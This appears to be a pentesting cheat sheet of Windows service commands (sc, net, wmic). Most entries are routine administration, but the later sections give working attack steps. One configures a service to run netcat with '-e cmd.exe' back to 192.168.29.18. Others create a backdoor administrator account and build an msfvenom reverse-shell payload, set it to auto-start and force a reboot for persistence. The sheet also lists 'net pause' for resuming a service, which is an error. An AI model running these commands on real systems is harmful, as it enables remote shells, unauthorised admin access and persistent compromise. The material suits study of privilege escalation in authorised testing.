Service Controller Utility Commands

Quering Services

  • Display inforamtionabout a specified service

sc query

  • Display extended information about a service

sc queryex type=service

  • Display services of type 'service'

sc query type=service

  • Find specific service state

sc query | find "STATE"

  • Find a specific service by name

sc query | find "Server"

  • Query a specific service

sc query <Service_name>

Service COnfigguration

  • Display the configuration of a service

sc qc <Service_Name>

  • Stop a service

sc stop <Service_Name>

  • Start a service

sc start <Service_name>

  • Pause a Service

sc pause <Service_name>

  • Resume a paused service

sc continue <Service_name>

  • Configure service startup and login accounts

sc config <Service_name>

Creating and Managing Services

  • Create a new Service

sc create nc binPath= "C:\Windows\System32\nc64.exe"

  • Query the configuration of a created service

sc qc nc

  • Query the status of a created service

sc query nc

  • Start the created service

sc start nc

  • Delete a service

sc delete nc

  • configure a service to run a specific command

sc config nc binPath= "C:\Windows\System32\nc64.exe 192.168.29.18 4444 -e cmd.exe"

  • Create a service to sned ICMP packets

sc create pingme binPath= "ping 192.168.29.18"

  • Create a User creation Service

sc create useradd binPath= "net user u1 DevNull@123 /add"

  • Configure a service to add a user to administrators group

sc config useradd binPath= "net localgroup administrators u1 /add"

Exploitation Example

  • Generate a reverse shell executable using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.29.18 LPORT=4455 -f exe > shell.exe

  • Configure a service to execute the shell

sc create nc binPath= "C:\Windows\Temp\shell.exe"
sc config nc start= auto

  • auto - Automatic startup

  • demand - Manual Startup

  • disabled - Disabled

  • Restart the system immediately

shutdown /r /t 0 /f

Service Management using net

  • start a service using net

net start <Service_name>

  • Stop a service using net

net stop <Service_name>

  • Pause a service using net

net pause <Service_Name>

  • Resume a paused service using net

net pause <Service_name>

Using wmic to manage service

  • List all services with details

wmic service get name,displayname,pathname,startmode

  • List all auto-start services

wmic service get name,displayname,pathname,startmode | findstr /i "auto"

  • List all auto-start service excluding those in C:\Windows

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows"

Additional Resources

PreviousUser Management CommandsNextWindows Firewall Management

Last updated